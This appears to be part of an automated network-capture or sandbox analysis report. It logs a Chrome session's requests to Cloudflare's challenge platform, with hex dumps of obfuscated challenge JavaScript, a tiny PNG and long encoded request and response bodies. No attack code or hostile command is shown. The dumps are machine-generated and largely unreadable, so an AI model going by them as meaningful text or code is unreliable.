                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 5d 2c 73 3d 6f 2c 78 3d 6e 65 77 20 65 4d 5b 28 68 75 28 33 33 35 29 29 5d 28 29 2c 21 78 29 72 65 74 75 72 6e 3b 42 3d 6b 5b 68 75 28 39 34 37 29 5d 2c 78 5b 68 75 28 31 33 36 34 29 5d 28 42 2c 6e 2c 21 21 5b 5d 29 2c 78 5b 68 75 28 37 32 32 29 5d 3d 32 35 30 30 2c 78 5b 68 75 28 32 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 78 5b 68 75 28 39 30 33 29 5d 28 68 75 28 31 30 31 36 29 2c 68 75 28 39 31 34 29 29 2c 43 3d 7b 7d 2c 43 5b 68 75 28 31 31 39 37 29 5d 3d 67 2c 43 2e 63 63 3d 68 2c 43 5b 68 75 28 31 34 31 31 29 5d 3d 6c 2c 43 5b 68 75 28 38 35 37 29 5d 3d 73 2c 44 3d 4a 53 4f 4e 5b 68 75 28 34 36 32 29 5d 28 43 29 2c 45 3d 67 76 5b 68 75 28 34 38 35 29 5d 28 44 29 5b 68 75 28 31 30 39 33 29 5d 28 27 2b 27 2c 68 75 28 36 32 38 29 29 2c 78
                                                                                  Data Ascii: ],s=o,x=new eM[(hu(335))](),!x)return;B=k[hu(947)],x[hu(1364)](B,n,!![]),x[hu(722)]=2500,x[hu(228)]=function(){},x[hu(903)](hu(1016),hu(914)),C={},C[hu(1197)]=g,C.cc=h,C[hu(1411)]=l,C[hu(857)]=s,D=JSON[hu(462)](C),E=gv[hu(485)](D)[hu(1093)]('+',hu(628)),x
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 3d 68 76 2c 65 4d 5b 68 78 28 31 32 39 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 68 78 28 31 31 36 39 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 76 28 31 30 37 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 79 29 7b 68 79 3d 68 76 2c 65 4d 5b 68 79 28 34 37 39 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 76 28 31 33 34 32 29 5d 5b 68 76 28 31 37 39 29 5d 28 68 76 28 31 32 31 34 29 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 6e 3d 7b 7d 2c 66 6e 5b 67 49 28 31 33 39 30 29 5d 3d 66 6d 2c 65 4d 5b 67 49 28 31 31 38 33 29 5d 3d 66 6e 2c 66 70 3d 65 4d 5b 67 49 28 31 32 39 33 29 5d 5b 67 49 28 37 38 36 29 5d 5b 67 49 28 31 32 32 39 29 5d 2c 66 71 3d 65 4d 5b 67 49 28 31 32 39 33 29 5d 5b 67 49 28 37 38 36 29 5d 5b 67 49 28 37 34 33 29 5d 2c 66 42 3d 21 5b 5d 2c
                                                                                  Data Ascii: =hv,eM[hx(129)](m,undefined,hx(1169))},10),eM[hv(1070)](function(hy){hy=hv,eM[hy(479)]()},1e3),eM[hv(1342)][hv(179)](hv(1214),m));return![]},fn={},fn[gI(1390)]=fm,eM[gI(1183)]=fn,fp=eM[gI(1293)][gI(786)][gI(1229)],fq=eM[gI(1293)][gI(786)][gI(743)],fB=![],
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 67 6f 3d 7b 7d 2c 67 6f 5b 67 49 28 33 35 33 29 5d 3d 27 6f 27 2c 67 6f 5b 67 49 28 34 30 36 29 5d 3d 27 73 27 2c 67 6f 5b 67 49 28 36 38 36 29 5d 3d 27 75 27 2c 67 6f 5b 67 49 28 37 39 34 29 5d 3d 27 7a 27 2c 67 6f 5b 67 49 28 38 39 38 29 5d 3d 27 6e 27 2c 67 6f 5b 67 49 28 31 34 32 39 29 5d 3d 27 49 27 2c 67 70 3d 67 6f 2c 65 4d 5b 67 49 28 31 34 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 6a 62 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 6a 62 3d 67 49 2c 6f 3d 7b 27 68 73 67 63 68 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 69 77 7a 48 41 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 67 55 45 71 59 27 3a 66
                                                                                  Data Ascii: go={},go[gI(353)]='o',go[gI(406)]='s',go[gI(686)]='u',go[gI(794)]='z',go[gI(898)]='n',go[gI(1429)]='I',gp=go,eM[gI(1404)]=function(g,h,i,j,jb,o,x,B,C,D,E,F){if(jb=gI,o={'hsgch':function(G,H){return G+H},'iwzHA':function(G,H,I,J){return G(H,I,J)},'gUEqY':f
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 5b 6a 65 28 39 37 35 29 5d 28 6d 2c 6c 5b 6a 65 28 31 32 30 38 29 5d 29 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 6b 5b 6a 65 28 33 37 34 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 5b 6c 5b 6d 5d 5d 5b 6a 65 28 31 32 30 38 29 5d 3b 2d 31 3d 3d 3d 68 5b 6e 5d 5b 6a 65 28 37 30 30 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 67 75 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 6a 65 28 31 31 34 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 6a 65 28 39 33 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 67 76 3d 66 75 6e 63 74 69 6f 6e 28 6a
                                                                                  Data Ascii: [je(975)](m,l[je(1208)]);m++)if(n=l[m],k[je(374)]('f',n)&&(n='N'),h[n]){for(o=0;o<i[l[m]][je(1208)];-1===h[n][je(700)](i[l[m]][o])&&(gu(i[l[m]][o])||h[n][je(114)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][je(931)](function(s){return'o.'+s})},gv=function(j
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 3e 69 7d 2c 27 45 46 64 4c 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 6e 42 66 48 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 73 4c 79 4c 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 75 49 42 6b 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 77 6e 47 43 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 49 63 68 61 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 56 69 7a 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 7a 63 73 50 7a 27 3a
                                                                                  Data Ascii: >i},'EFdLO':function(h,i){return i!=h},'nBfHa':function(h,i){return h(i)},'sLyLa':function(h,i){return h&i},'uIBkI':function(h,i){return h<i},'wnGCa':function(h,i){return i!=h},'IchaX':function(h,i){return h<i},'AVizK':function(h,i){return i===h},'zcsPz':
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 69 28 39 38 30 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 6a 69 28 31 35 34 39 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 6a 69 28 33 38 37 29 5d 28 49 2c 31 29 7c 64 5b 6a 69 28 37 37 33 29 5d 28 4e 2c 31 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 6a 69 28 31 31 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 64 5b 6a 69 28 31 35 33 38 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 4e 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 6a 69 28 31 31 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 69 28 39 38 30 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 6a 69 28 31 35 34 39 29 5d 28 31
                                                                                  Data Ascii: +);for(N=D[ji(980)](0),x=0;d[ji(1549)](8,x);I=d[ji(387)](I,1)|d[ji(773)](N,1),j-1==J?(J=0,H[ji(114)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;d[ji(1538)](x,G);I=I<<1|N,j-1==J?(J=0,H[ji(114)](o(I)),I=0):J++,N=0,x++);for(N=D[ji(980)](0),x=0;d[ji(1549)](1
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 6a 69 28 31 34 30 38 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 6a 69 28 35 33 39 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 6a 69 28 31 35 33 38 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 6a 69 28 31 33 37 38 29 5d 28 64 5b 6a 69 28 31 32 33 37 29 5d 28 49 2c 31 29 2c 64 5b 6a 69 28 31 35 30 37 29 5d 28 4e 2c 31 29 29 2c 64 5b 6a 69 28 38 32 37 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 69 28 31 31 34 29 5d 28 64 5b 6a 69 28 31 34 31 36 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 30 3d 3d 45 26 26 47 2b 2b
                                                                                  Data Ascii: ),I=0):J++,N>>=1,x++);}E--,d[ji(1408)](0,E)&&(E=Math[ji(539)](2,G),G++),delete C[D]}else for(N=B[D],x=0;d[ji(1538)](x,G);I=d[ji(1378)](d[ji(1237)](I,1),d[ji(1507)](N,1)),d[ji(827)](J,j-1)?(J=0,H[ji(114)](d[ji(1416)](o,I)),I=0):J++,N>>=1,x++);E--,0==E&&G++


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.449767104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:45 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:45 UTC210INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:45 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d81fbf9a42d8-EWR
                                                                                  2024-10-02 15:49:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.449768104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:45 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 2747
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: 77bf10bc9e9db0f
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:45 UTC2747OUTData Raw: 76 5f 38 63 63 35 64 38 31 35 39 63 65 35 31 38 35 64 3d 6b 52 2d 4b 5a 4b 56 4b 52 4b 31 4b 72 69 6d 50 69 6d 7a 4b 69 49 30 64 62 6c 69 43 6d 62 6d 38 35 49 34 51 32 6d 67 53 4e 6d 32 32 69 25 32 62 6d 66 6d 39 49 43 64 58 32 6d 6f 6d 61 58 46 54 30 74 68 73 6d 74 4b 62 58 6d 44 42 7a 64 2b 6d 43 4b 6d 2b 73 6d 2d 49 6d 73 38 6d 6d 49 4d 56 6d 45 49 30 65 42 67 2b 51 38 36 32 4d 6d 43 74 68 59 53 4a 70 32 68 43 6b 4b 30 56 33 35 6e 52 4f 73 68 79 68 79 49 74 68 56 6d 6e 6d 68 31 6d 79 66 39 53 39 7a 51 6f 30 48 30 49 31 2d 6d 79 38 24 4b 45 69 4b 68 6b 67 32 68 6e 68 4b 32 77 69 4b 6d 54 6b 6d 68 24 54 2d 6d 61 39 35 66 32 6d 69 73 6d 4d 4c 64 73 30 54 56 59 34 30 74 6d 71 49 6d 55 6d 68 58 4a 6d 30 58 4f 57 2d 68 4c 6d 6d 63 43 6d 69 4c 45 47 55 2b 57
                                                                                  Data Ascii: v_8cc5d8159ce5185d=kR-KZKVKRK1KrimPimzKiI0dbliCmbm85I4Q2mgSNm22i%2bmfm9ICdX2momaXFT0thsmtKbXmDBzd+mCKm+sm-Ims8mmIMVmEI0eBg+Q862MmCthYSJp2hCkK0V35nROshyhyIthVmnmh1myf9S9zQo0H0I1-my8$KEiKhkg2hnhK2wiKmTkmh$T-ma95f2mismMLds0TVY40tmqImUmhXJm0XOW-hLmmcCmiLEGU+W
                                                                                  2024-10-02 15:49:45 UTC717INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:45 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 152120
                                                                                  Connection: close
                                                                                  cf-chl-gen: SSDS4YeeXZkzvOdwYYVLgJ6jtkHBL097K0vd3wUj9WjaSI6CfJVaZDDQLVeIG1wPp1G5sPG3n7mgssyAGqDje1HEx97VdQOiFIVbiZEedunYxnwfJlWmeQxUUmF1MPO1G0011Zt6yD6lzknjO71RcmW+adN1ma1X4dEIW4oWzlnPq2pMxm3VuSOahwtCvgVQNzFdYqzMRrTpJwsdnpM4CifK/woHA8DIefmES0Ax9XgPflXfQ9NUsQDf4pa8kXHHFufrtpSiHBbdH4pA+Hb5FO5SCPhoMXytM6BCVxj0oGkzLEzmOGdFqEuwzS2Z5BM25BO70PFIfkIuO2o40bZ6Z1hxHYGMITP3IGV+EgHmGadi32Qqab6xIR8JX9zxokY4g6FK46VND/rAF8aYKTl6nYTLQEnOoclF0LuNvPK6T/Ud3XjXVP+T4H6JOonemfg7Y+6vuohiiTmx9m762CIJYhFI+Pyqcje2vgMxQKqpBhy0FTQ=$+1rlPlP6oguDs2cy
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8207ee819b6-EWR
                                                                                  2024-10-02 15:49:45 UTC652INData Raw: 6e 5a 65 52 6a 4b 50 45 67 71 4f 56 6f 71 79 36 70 4d 32 61 6f 73 32 37 78 34 76 44 79 4b 72 57 72 4d 36 6c 6e 4a 33 4b 7a 4e 71 63 33 70 32 63 30 37 6a 47 35 72 76 66 35 73 54 4c 34 4c 33 65 76 63 50 4f 76 4d 4f 76 38 61 37 56 37 4e 76 71 78 62 62 4a 30 72 33 39 77 64 75 38 7a 75 38 48 79 41 50 55 43 65 41 41 31 77 7a 6c 41 38 6f 56 36 68 66 53 43 76 48 6f 44 68 76 61 46 2f 48 36 46 78 6f 66 46 4e 7a 7a 46 76 44 67 2f 65 54 31 48 51 4c 6f 2b 53 45 70 4c 50 51 6e 46 2f 51 54 39 41 38 6f 46 52 6b 49 44 43 77 52 43 78 41 77 46 44 59 64 50 79 55 36 42 7a 6f 73 4b 69 35 48 43 45 6b 38 54 55 70 58 55 43 6c 4c 57 6a 31 47 4c 46 6c 63 51 46 51 7a 46 6b 31 62 53 44 4a 66 58 54 78 4b 51 43 42 6e 58 6c 38 37 54 6c 42 56 63 6e 42 4c 64 32 39 6b 66 46 56 30 62 57 78
                                                                                  Data Ascii: nZeRjKPEgqOVoqy6pM2aos27x4vDyKrWrM6lnJ3KzNqc3p2c07jG5rvf5sTL4L3evcPOvMOv8a7V7NvqxbbJ0r39wdu8zu8HyAPUCeAA1wzlA8oV6hfSCvHoDhvaF/H6FxofFNzzFvDg/eT1HQLo+SEpLPQnF/QT9A8oFRkIDCwRCxAwFDYdPyU6BzosKi5HCEk8TUpXUClLWj1GLFlcQFQzFk1bSDJfXTxKQCBnXl87TlBVcnBLd29kfFV0bWx
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 61 36 56 70 6b 4b 69 6f 72 33 4b 56 73 71 56 79 68 6f 52 30 67 37 47 34 69 34 6d 65 66 4a 6d 39 73 4a 6d 46 72 36 43 49 77 37 71 4b 72 6f 69 4c 70 4d 71 2f 77 36 7a 48 70 74 47 7a 6d 4d 37 55 71 62 43 64 33 71 43 37 7a 62 57 31 74 4a 79 37 75 62 4b 2f 77 75 57 6e 75 39 6a 68 79 66 4c 66 30 73 50 4c 74 39 6d 79 37 38 4f 37 38 4d 72 4f 36 66 7a 76 79 37 33 59 34 73 2f 6b 79 65 41 45 39 50 67 46 79 50 45 42 33 65 48 63 44 50 50 6b 31 2f 58 6e 36 2f 30 49 45 77 72 6f 2f 65 41 6a 44 51 51 51 43 66 41 47 36 43 72 70 44 42 67 51 48 77 37 77 4e 42 30 55 49 43 41 42 46 76 67 37 2b 52 77 6f 49 53 38 65 41 55 55 74 4a 44 41 78 45 53 59 4a 54 45 55 73 4f 44 6c 47 48 55 41 70 45 69 56 45 49 6b 4d 6c 4e 68 56 49 53 56 63 6f 59 44 4a 51 4a 42 64 50 52 7a 42 6f 4f 69 59
                                                                                  Data Ascii: a6VpkKior3KVsqVyhoR0g7G4i4mefJm9sJmFr6CIw7qKroiLpMq/w6zHptGzmM7UqbCd3qC7zbW1tJy7ubK/wuWnu9jhyfLf0sPLt9my78O78MrO6fzvy73Y4s/kyeAE9PgFyPEB3eHcDPPk1/Xn6/0IEwro/eAjDQQQCfAG6CrpDBgQHw7wNB0UICABFvg7+RwoIS8eAUUtJDAxESYJTEUsODlGHUApEiVEIkMlNhVISVcoYDJQJBdPRzBoOiY
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 34 32 6f 73 4c 43 59 63 72 53 71 70 37 57 5a 74 72 35 2b 6c 61 47 34 6b 4a 61 59 70 4b 44 47 69 72 36 32 78 34 32 73 71 4d 36 50 78 72 37 50 77 71 65 69 6a 38 2f 46 78 4a 32 2f 30 61 69 31 73 36 79 69 32 35 2f 6e 76 36 44 64 77 4c 54 41 7a 39 75 39 77 38 2f 69 78 75 54 74 79 63 44 59 78 37 50 54 39 4c 72 62 2b 39 65 2f 7a 39 50 44 7a 74 62 6d 34 75 6a 30 36 41 33 6d 41 75 73 43 34 41 48 6f 34 75 37 71 45 2f 59 4f 32 75 66 2b 44 52 6f 4e 2f 42 76 68 45 67 49 67 35 52 55 72 48 4f 6f 45 39 65 34 4c 4b 52 73 4c 46 50 34 4f 38 51 37 71 45 76 63 51 4c 66 63 4b 45 7a 54 36 52 42 30 66 41 42 49 64 46 67 4e 4d 4a 44 30 49 47 69 46 42 51 67 30 7a 43 30 6f 52 4e 44 70 4b 4c 6b 70 4b 45 46 39 64 50 32 46 45 55 6b 38 78 59 7a 74 57 61 30 46 49 56 55 49 74 54 47 35 69
                                                                                  Data Ascii: 42osLCYcrSqp7WZtr5+laG4kJaYpKDGir62x42sqM6Pxr7Pwqeij8/FxJ2/0ai1s6yi25/nv6DdwLTAz9u9w8/ixuTtycDYx7PT9Lrb+9e/z9PDztbm4uj06A3mAusC4AHo4u7qE/YO2uf+DRoN/BvhEgIg5RUrHOoE9e4LKRsLFP4O8Q7qEvcQLfcKEzT6RB0fABIdFgNMJD0IGiFBQg0zC0oRNDpKLkpKEF9dP2FEUk8xYztWa0FIVUItTG5i
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 4b 6d 6c 37 4b 58 6d 37 2b 52 6a 62 32 30 6b 4c 2b 61 66 72 47 62 71 63 53 31 78 63 36 74 7a 4e 44 52 70 71 71 4f 78 64 50 52 30 63 6e 59 72 38 57 59 31 62 4b 33 6f 74 37 63 75 2b 48 47 70 61 4c 5a 34 62 2f 56 33 2b 58 44 33 65 76 75 37 4d 76 6c 37 63 66 48 36 64 54 48 74 74 43 33 30 50 57 34 32 72 76 64 32 2f 6a 6d 31 50 62 59 39 65 6e 38 32 41 62 4f 2f 67 59 57 35 77 41 46 7a 74 62 5a 31 67 34 4a 42 2f 72 75 38 75 33 39 39 2f 76 67 38 2f 37 6d 2f 50 77 61 44 51 72 6d 41 75 37 75 44 68 38 50 41 67 6f 76 42 44 6a 36 42 77 73 75 4b 76 6b 54 44 53 2f 2b 51 55 67 31 4a 78 38 37 4e 52 73 6c 4b 6c 45 4f 4d 45 34 6f 49 67 34 57 4d 69 38 32 47 43 55 57 4f 56 49 57 4f 53 73 66 5a 45 59 38 50 30 4d 79 4e 7a 39 64 61 56 74 5a 4b 6b 56 42 58 54 35 57 63 45 4a 59 5a
                                                                                  Data Ascii: Kml7KXm7+Rjb20kL+afrGbqcS1xc6tzNDRpqqOxdPR0cnYr8WY1bK3ot7cu+HGpaLZ4b/V3+XD3evu7Mvl7cfH6dTHttC30PW42rvd2/jm1PbY9en82AbO/gYW5wAFztbZ1g4JB/ru8u399/vg8/7m/PwaDQrmAu7uDh8PAgovBDj6BwsuKvkTDS/+QUg1Jx87NRslKlEOME4oIg4WMi82GCUWOVIWOSsfZEY8P0MyNz9daVtZKkVBXT5WcEJYZ
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 72 73 70 68 37 76 70 4e 38 6e 49 43 38 71 63 44 47 6d 34 53 6b 72 63 53 78 7a 4b 69 6a 6a 4b 75 51 7a 4c 6e 54 31 71 75 55 73 37 33 55 77 64 75 34 73 35 79 36 32 39 7a 4a 35 65 58 48 77 63 75 76 71 4f 50 30 7a 4d 37 6a 34 4e 6a 4e 39 72 76 62 79 38 66 56 37 76 4c 66 41 65 54 76 2b 4f 59 43 78 66 6b 48 35 67 6f 4a 34 4d 34 4b 38 51 58 67 38 50 37 58 79 68 6b 4f 7a 52 6a 73 38 67 38 62 49 41 50 2b 41 66 4c 75 42 52 73 56 38 67 6b 68 44 2f 63 4c 44 68 7a 6f 44 65 76 2b 46 51 73 4c 4c 7a 55 53 47 7a 45 30 4b 7a 4d 74 4c 79 58 38 42 6a 77 6f 47 43 73 66 4e 67 51 6a 51 78 73 6c 51 69 63 78 4c 6b 78 42 51 53 38 54 56 55 67 33 55 46 51 31 54 78 6c 50 4e 47 56 51 56 54 31 59 61 47 41 2f 53 45 34 76 50 53 6b 71 54 56 4a 54 4b 44 42 58 4d 57 68 59 56 48 31 51 53 6f
                                                                                  Data Ascii: rsph7vpN8nIC8qcDGm4SkrcSxzKijjKuQzLnT1quUs73Uwdu4s5y629zJ5eXHwcuvqOP0zM7j4NjN9rvby8fV7vLfAeTv+OYCxfkH5goJ4M4K8QXg8P7XyhkOzRjs8g8bIAP+AfLuBRsV8gkhD/cLDhzoDev+FQsLLzUSGzE0KzMtLyX8BjwoGCsfNgQjQxslQicxLkxBQS8TVUg3UFQ1TxlPNGVQVT1YaGA/SE4vPSkqTVJTKDBXMWhYVH1QSo
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 6d 71 4b 70 75 35 36 39 75 72 79 46 71 73 66 4d 6b 49 62 4f 30 6f 32 79 7a 39 53 57 32 4a 75 65 73 64 44 69 30 37 53 2b 32 2b 57 36 77 37 33 65 76 2b 32 35 37 4b 75 37 36 37 48 47 7a 38 48 79 79 50 6a 5a 74 4c 66 57 76 4c 7a 53 79 2f 4d 45 31 39 72 45 41 39 77 4b 39 2f 37 48 34 67 73 45 7a 75 62 6f 43 38 37 47 36 52 48 73 47 64 67 49 30 66 59 55 47 64 77 68 2f 65 48 33 2f 69 54 66 2f 43 6b 72 48 65 6b 45 2b 43 62 73 34 68 77 72 42 44 49 73 4d 67 77 54 39 44 77 52 4f 6a 54 36 45 77 77 73 2f 42 67 62 49 6a 38 65 53 69 6f 45 49 45 34 57 43 77 77 6e 44 46 45 50 42 79 5a 50 4b 46 55 32 57 44 4a 64 58 42 73 30 59 69 31 67 4e 31 5a 51 49 6a 6c 6c 52 57 51 71 52 44 6c 6f 4c 6a 74 6f 59 30 4d 72 4c 57 39 4c 54 33 68 75 55 30 68 4b 65 56 56 79 62 48 31 41 57 34 52
                                                                                  Data Ascii: mqKpu569uryFqsfMkIbO0o2yz9SW2JuesdDi07S+2+W6w73ev+257Ku767HGz8HyyPjZtLfWvLzSy/ME19rEA9wK9/7H4gsEzuboC87G6RHsGdgI0fYUGdwh/eH3/iTf/CkrHekE+Cbs4hwrBDIsMgwT9DwROjT6Ewws/BgbIj8eSioEIE4WCwwnDFEPByZPKFU2WDJdXBs0Yi1gN1ZQIjllRWQqRDloLjtoY0MrLW9LT3huU0hKeVVybH1AW4R
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 38 32 69 6d 6f 66 45 70 74 58 50 79 71 71 6a 72 63 71 61 32 61 6a 53 6e 4c 62 69 33 61 48 67 34 75 53 69 35 4b 50 66 71 63 4b 6e 36 71 32 6d 76 4f 69 77 34 4b 2f 71 74 66 58 45 36 72 69 75 2f 76 6d 38 73 72 2f 37 76 37 62 2b 41 38 4b 36 34 41 6e 4a 2b 41 38 44 7a 73 4c 74 43 2b 66 75 7a 42 6a 6f 43 75 30 61 37 2f 4c 31 33 50 62 71 32 43 4c 32 46 52 41 62 2f 4e 6f 47 4b 41 49 74 4c 4f 6f 45 4d 76 77 77 42 53 59 43 4c 2f 4d 50 4e 7a 54 36 45 7a 73 36 2f 53 30 38 4f 78 52 42 49 6b 51 65 53 55 67 48 49 45 34 5a 54 43 4e 43 50 41 34 6c 55 54 46 51 46 6a 41 6c 56 42 6f 7a 57 31 6b 79 55 54 56 57 4e 6c 5a 67 49 44 31 61 50 6d 6c 43 57 55 6c 6a 4c 30 64 62 61 44 42 78 59 47 39 49 64 56 5a 33 55 58 35 73 63 7a 78 58 67 33 34 2f 4f 31 46 37 52 54 74 7a 68 46 35 39
